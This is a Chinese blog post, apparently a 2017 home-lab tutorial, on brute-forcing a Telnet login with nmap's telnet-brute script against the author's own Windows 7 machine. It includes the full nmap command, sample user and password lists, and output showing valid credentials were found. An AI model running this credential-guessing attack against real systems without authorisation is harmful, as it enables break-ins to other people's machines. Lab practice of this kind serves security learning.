【20171115中】nmap 使用脚本爆破telnet密码

  今天老黑走出了低谷,设置了惩罚机制后效率提升了很多,现在写一个使用nmap检测目标主机漏洞和利用漏洞的文章,话不多说,直接开始!

0x01:环境介绍

  主机A:系统 - kali2017,IP - 192.168.1.104

  主机B:系统 - win7x64,IP - 192.168.1.103

  使用主机A扫描并攻入主机B

0x02:确认主机B开启了telnet的23端口

  主机B没有开启,我自己开启一下。

  s1:控制面板 -> 程序 -> 打开或关闭windows程序 -> 选中下图选项框,点击确认后重启系统。

  s2:确认计算机telnet服务是否已经开启。打开计算机右击 -> 管理 -> 服务和应用程序 -> 服务 -> 找到Telnet服务,并将其开启服务和设置自动

0x03:在主机A扫描确认主机B是否开启了23端口

  

0x04:进行爆破

  s1:参考官网了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑将自己的账号AAAA放在myusers.lst中,如下:

    

AAAA
AA22
ASDFSA
SDSDD

    将自己的密码BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根据主机A的环境,调整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:执行命令,等待结果

root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
Nmap scan report for promote.cache-dns.local (192.168.1.103)
Host is up (0.091s latency).

PORT   STATE SERVICE
23/tcp open  telnet
| telnet-brute: 
|   Accounts: 
|     AAAA:BBBB - Valid credentials
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  

 

0x05:telnet登陆主机B,WELL DONE!

 

posted @ 2017-11-15 18:26  黑楼绝  阅读(5361)  评论(0编辑  收藏  举报